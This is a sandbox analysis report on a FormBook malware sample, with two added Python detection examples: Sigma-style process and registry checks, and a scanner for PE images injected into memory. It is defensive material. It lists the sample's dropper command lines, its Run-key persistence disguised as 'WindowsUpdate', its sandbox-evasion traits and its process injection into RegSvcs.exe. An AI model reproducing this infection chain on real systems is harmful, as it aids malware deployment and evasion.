Windows Analysis Report
uhbrQkYNzx.exe

Overview

General Information

Sample name: uhbrQkYNzx.exe (renamed because the original name is a hash value)
Original sample name: f9b5af130a858971c48de2b78ac57dc335d2e5fa905887ab0e058c083cfc5fe3.exe
Analysis ID: 1569428
MD5: c98eea303da1d7b92f96d6a8b62d74d2
SHA1: 1ef9752163fa156a8831d759d2750ca23fa38e26
SHA256: f9b5af130a858971c48de2b78ac57dc335d2e5fa905887ab0e058c083cfc5fe3
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM autoit script
Yara detected Autoit Injector
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
Creates autostart registry keys with suspicious values (likely registry only malware)
Found API chain indicative of sandbox detection
Injects a PE file into a foreign processes
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ipconfig to lookup or modify the Windows network settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • uhbrQkYNzx.exe (PID: 2004 cmdline: "C:\Users\user\Desktop\uhbrQkYNzx.exe" MD5: C98EEA303DA1D7B92F96D6A8B62D74D2)
    • wscript.exe (PID: 3540 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2356 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 1916 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
      • cmd.exe (PID: 6668 cmdline: "C:\Windows\System32\cmd.exe" /c tguujh.msc nhhjmppg.dll MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tguujh.msc (PID: 2056 cmdline: tguujh.msc nhhjmppg.dll MD5: 0ADB9B817F1DF7807576C2D7068DD931)
          • RegSvcs.exe (PID: 3028 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
          • RegSvcs.exe (PID: 2840 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • cmd.exe (PID: 1624 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 3256 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • tguujh.msc.exe (PID: 5748 cmdline: "C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE" C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 6844 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 5580 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • WerFault.exe (PID: 5204 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 80 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Source | Rule | Description | Author
0000000F.00000002.2027536696.00000000008D0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000F.00000002.2027256382.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Process Memory Space: tguujh.msc PID: 2056 | JoeSecurity_AntiVM_1 | Yara detected AntiVM autoit script | Joe Security
Process Memory Space: tguujh.msc PID: 2056 | JoeSecurity_AutoitInjector | Yara detected Autoit Injector | Joe Security
Process Memory Space: tguujh.msc.exe PID: 5748 | JoeSecurity_AntiVM_1 | Yara detected AntiVM autoit script | Joe Security
(1 further entry not shown in this export)

Source | Rule | Description | Author
15.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
15.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

System Summary

Source: Process started | Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 3540, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 2356, ProcessName: cmd.exe
Source: Process started | Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 3540, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 2356, ProcessName: cmd.exe
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe, ProcessId: 5748, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\uhbrQkYNzx.exe", ParentImage: C:\Users\user\Desktop\uhbrQkYNzx.exe, ParentProcessId: 2004, ParentProcessName: uhbrQkYNzx.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , ProcessId: 3540, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\uhbrQkYNzx.exe", ParentImage: C:\Users\user\Desktop\uhbrQkYNzx.exe, ParentProcessId: 2004, ParentProcessName: uhbrQkYNzx.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , ProcessId: 3540, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\uhbrQkYNzx.exe", ParentImage: C:\Users\user\Desktop\uhbrQkYNzx.exe, ParentProcessId: 2004, ParentProcessName: uhbrQkYNzx.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , ProcessId: 3540, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe, ProcessId: 5748, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
Source: Process started | Author: Max Altgelt (Nextron Systems): Data: Command: tguujh.msc nhhjmppg.dll, CommandLine: tguujh.msc nhhjmppg.dll, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc, NewProcessName: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc, OriginalFileName: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c tguujh.msc nhhjmppg.dll, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6668, ParentProcessName: cmd.exe, ProcessCommandLine: tguujh.msc nhhjmppg.dll, ProcessId: 2056, ProcessName: tguujh.msc
Source: Process started | Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE" C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll, CommandLine: "C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE" C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE" C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll, ProcessId: 5748, ProcessName: tguujh.msc.exe
Source: Process started | Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\uhbrQkYNzx.exe", ParentImage: C:\Users\user\Desktop\uhbrQkYNzx.exe, ParentProcessId: 2004, ParentProcessName: uhbrQkYNzx.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , ProcessId: 3540, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\uhbrQkYNzx.exe", ParentImage: C:\Users\user\Desktop\uhbrQkYNzx.exe, ParentProcessId: 2004, ParentProcessName: uhbrQkYNzx.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , ProcessId: 3540, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc, ProcessId: 2056, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
No Suricata rule has matched
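The Sigma rows above reduce to a handful of checks on process-creation and registry events: a script host started on a file in a RarSFX temp folder, cmd.exe spawned by wscript.exe, a file with a non-executable extension (.msc) run as a process, an 8.3 short name (user~1, TGUUJH~1.EXE) in a command line, and a Run value pointing into %TEMP%. The following Python is an added example written for this page, not Joe Sandbox or Sigma code. It re-implements those checks over Sysmon-style events constructed from the process tree and Sigma rows of this report, plus one constructed benign control event (PID 4100, the same ipconfig pattern launched from explorer.exe). The last rule, flagging RegSvcs.exe started by a parent living in a temp folder, is this example's own heuristic for the injection target seen in the tree and is not one of the Sigma rules the report lists.

```python
import re

# Constructed Sysmon-style events transcribed from the process tree and Sigma rows of
# this report (EventID 1 = process creation, EventID 13 = registry value set).
# PID 4100 is a constructed benign control: same cmd.exe/ipconfig pattern, but started
# by explorer.exe rather than a script host, so no rule should fire on it.
EVENTS = [
    {"EventID": 1, "ProcessId": 3540, "Image": r"C:\Windows\SysWOW64\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe"',
     "ParentImage": r"C:\Users\user\Desktop\uhbrQkYNzx.exe"},
    {"EventID": 1, "ProcessId": 2356, "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c ipconfig /release',
     "ParentImage": r"C:\Windows\SysWOW64\wscript.exe"},
    {"EventID": 1, "ProcessId": 2056, "Image": r"C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc",
     "CommandLine": "tguujh.msc nhhjmppg.dll",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe"},
    {"EventID": 13, "ProcessId": 2056, "Image": r"C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc",
     "TargetObject": r"HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate",
     "Details": r"C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll"},
    {"EventID": 1, "ProcessId": 3028, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"',
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc"},
    {"EventID": 1, "ProcessId": 4100, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c ipconfig /all',
     "ParentImage": r"C:\Windows\explorer.exe"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXT = re.compile(r"\.(?:vbe|vbs|js|jse|wsf)\b", re.I)
# User-writable staging folders, in the spirit of the Sigma "suspicious folder" lists.
SUSPICIOUS_DIRS = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp|Users\\Public|ProgramData)\\", re.I)
# NTFS 8.3 component inside a command line: "user~1\" or "TGUUJH~1.EXE".
SHORT_NAME = re.compile(r"~\d+(?:\\|\.(?:exe|dll|bat|cmd|vbs|vbe|js|msi)\b)", re.I)
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
PE_EXTS = {"exe", "com", "scr", "pif"}          # extensions Windows normally runs as PE images
# .NET utilities often started with no arguments purely to host injected code
# (assumption: heuristic of this example, not a rule from the report).
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}


def base(path):
    # os.path.basename only splits on "/" on POSIX, so split Windows paths by hand.
    return path.rsplit("\\", 1)[-1].lower()


def ext(path):
    name = base(path)
    return name.rsplit(".", 1)[-1] if "." in name else ""


def is_proc(ev):
    return ev["EventID"] == 1


def script_host_from_suspicious_dir(ev):
    return (is_proc(ev) and base(ev["Image"]) in SCRIPT_HOSTS
            and SUSPICIOUS_DIRS.search(ev["CommandLine"]) is not None
            and SCRIPT_EXT.search(ev["CommandLine"]) is not None)


def shell_spawned_by_script_host(ev):
    return is_proc(ev) and base(ev["ParentImage"]) in SCRIPT_HOSTS and base(ev["Image"]) == "cmd.exe"


def short_name_in_cmdline(ev):
    return is_proc(ev) and SHORT_NAME.search(ev["CommandLine"]) is not None


def non_exec_extension(ev):
    return is_proc(ev) and ext(ev["Image"]) not in PE_EXTS


def run_key_to_suspicious_folder(ev):
    return (ev["EventID"] == 13 and RUN_KEY.search(ev["TargetObject"]) is not None
            and SUSPICIOUS_DIRS.search(ev["Details"]) is not None)


def dotnet_host_from_suspicious_parent(ev):
    return (is_proc(ev) and base(ev["Image"]) in DOTNET_HOSTS
            and SUSPICIOUS_DIRS.search(ev["ParentImage"]) is not None)


RULES = [script_host_from_suspicious_dir, shell_spawned_by_script_host, short_name_in_cmdline,
         non_exec_extension, run_key_to_suspicious_folder, dotnet_host_from_suspicious_parent]


def evaluate(events):
    """Return (rule name, ProcessId) for every rule that fires on every event, in event order."""
    return [(rule.__name__, ev["ProcessId"]) for ev in events for rule in RULES if rule(ev)]


if __name__ == "__main__":
    for rule, pid in evaluate(EVENTS):
        print(f"{rule:36} PID {pid}")
```

Run stand-alone it prints six findings for PIDs 3540, 2356, 2056 (twice) and 3028 and nothing for the control PID 4100. Each rule is deliberately a single predicate on one event so it can be lifted into a Sigma `detection:` block or a SIEM query without reworking the logic; correlation (wscript.exe in Temp, then cmd.exe, then a Run value into Temp from the same tree) is the next step a real pipeline would add on top.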

AV Detection

Source: uhbrQkYNzx.exe | ReversingLabs: Detection: 68%
Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.2027536696.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2027256382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
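The FormBook Yara hits come from the memory of RegSvcs.exe (process 15 of the analysis) and from a PE unpacked at 0x400000, the default load address of a 32-bit executable. Together with the signatures "Creates a process in suspended mode (likely to inject code)", "Writes to foreign memory regions" and "Injects a PE file into a foreign processes" this is the picture of a legitimate .NET utility started suspended and its image replaced. The Python below is an added example written for this page, not Joe Sandbox code. It shows the heuristic a memory scanner uses to find such a region without any malware-specific signature: a private (not image-backed) executable region that begins with a well-formed PE header, and in particular one sitting at that PE's own preferred ImageBase. The region list is constructed inline (on a live Windows host it would come from VirtualQueryEx and ReadProcessMemory); the PE header is a minimal constructed PE32 header carrying the same EXECUTABLE_IMAGE and 32BIT_MACHINE characteristics the report lists for the sample. Reading the dump-name fields as page protection (0x40 = PAGE_EXECUTE_READWRITE, 0x04 = PAGE_READWRITE) and region type (0x20000 = MEM_PRIVATE) is an assumption about the naming scheme used here to pick the constructed values.

```python
import struct

PAGE_READWRITE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE = 0x04, 0x20, 0x40
EXEC_PROTECT = {0x10, 0x20, 0x40, 0x80}       # PAGE_EXECUTE, _READ, _READWRITE, _WRITECOPY
MEM_PRIVATE, MEM_IMAGE = 0x20000, 0x1000000


def parse_pe(buf):
    """Return (machine, image_base, size_of_image) if buf starts with a well-formed PE header, else None."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    opt = e_lfanew + 24                        # 4-byte signature + 20-byte COFF header
    if opt + 60 > len(buf) or buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine = struct.unpack_from("<H", buf, e_lfanew + 4)[0]
    magic = struct.unpack_from("<H", buf, opt)[0]
    if magic == 0x10B:                         # PE32: ImageBase is a DWORD at optional-header offset 28
        image_base = struct.unpack_from("<I", buf, opt + 28)[0]
    elif magic == 0x20B:                       # PE32+: ImageBase is a QWORD at offset 24
        image_base = struct.unpack_from("<Q", buf, opt + 24)[0]
    else:
        return None
    size_of_image = struct.unpack_from("<I", buf, opt + 56)[0]
    return machine, image_base, size_of_image


def find_injected_pe(regions):
    """Flag private, executable regions that start with a PE header.

    A legitimately loaded module is MEM_IMAGE (backed by its file on disk). After hollowing,
    the original image at the preferred base has been unmapped and replaced by a private,
    writable+executable allocation the loader never saw."""
    hits = []
    for r in regions:
        if r["protect"] not in EXEC_PROTECT or r["type"] != MEM_PRIVATE:
            continue
        pe = parse_pe(r["data"])
        if pe is None:
            continue
        machine, image_base, size_of_image = pe
        hits.append({"base": r["base"], "machine": machine, "size_of_image": size_of_image,
                     "at_preferred_base": image_base == r["base"]})
    return hits


def build_pe32_header(image_base, size_of_image):
    """Constructed minimal PE32 header (DOS header, COFF header, optional header) for the demo."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                          # e_lfanew
    # i386, one section, 224-byte optional header, EXECUTABLE_IMAGE | 32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<I", opt, 56, size_of_image)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Constructed region list standing in for VirtualQueryEx/ReadProcessMemory output of the
# hollowed RegSvcs.exe; the 0x400000 and 0x8D0000 bases echo the dump names in the report.
REGIONS = [
    {"base": 0x400000, "protect": PAGE_EXECUTE_READWRITE, "type": MEM_PRIVATE,
     "data": build_pe32_header(0x400000, 0x30000)},                 # unpacked payload at preferred base
    {"base": 0x8D0000, "protect": PAGE_READWRITE, "type": MEM_PRIVATE,
     "data": b"\x00" * 64 + b"constructed config blob"},             # RW data: Yara territory, not this check
    {"base": 0x600000, "protect": PAGE_EXECUTE_READWRITE, "type": MEM_PRIVATE,
     "data": b"\x90" * 32 + b"\xCC"},                                # RWX but no PE header (shellcode-like)
    {"base": 0x77000000, "protect": PAGE_EXECUTE_READ, "type": MEM_IMAGE,
     "data": build_pe32_header(0x77000000, 0x100000)},              # legitimate image-backed module
]

if __name__ == "__main__":
    for h in find_injected_pe(REGIONS):
        print(f"PE at 0x{h['base']:08X} machine=0x{h['machine']:X} "
              f"size=0x{h['size_of_image']:X} at_preferred_base={h['at_preferred_base']}")
```

Only the 0x400000 region is reported. The read/write region at 0x8D0000 is exactly the case this structural check misses and where the string-based Yara match in the report still earns its keep, and the header-less RWX region at 0x600000 would need a separate shellcode heuristic; the check is intentionally narrow so that its positive result (a full PE image, at its own preferred base, in memory the loader did not map) is hard to explain benignly.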
Compliance

Source: uhbrQkYNzx.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: uhbrQkYNzx.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: uhbrQkYNzx.exe
Source: Binary string: wntdll.pdbUGP | source: RegSvcs.exe, 0000000F.00000002.2027782014.0000000000E60000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.2027782014.0000000000E60000.00000040.00001000.00020000.00000000.sdmp
Spreading

Source: C:\Users\user\Desktop\uhbrQkYNzx.exe | Code function: 0_2_0099F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0099F826
Source: C:\Users\user\Desktop\uhbrQkYNzx.exe | Code function: 0_2_009B1630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_009B1630
Source: C:\Users\user\Desktop\uhbrQkYNzx.exe | Code function: 0_2_009C1FF8 FindFirstFileExA,0_2_009C1FF8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function: 10_2_00CBE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_00CBE387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function: 10_2_00CBD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00CBD836
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function: 10_2_00CBDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00CBDB69
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | Code function: 10_2_00CC9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00CC9F9F
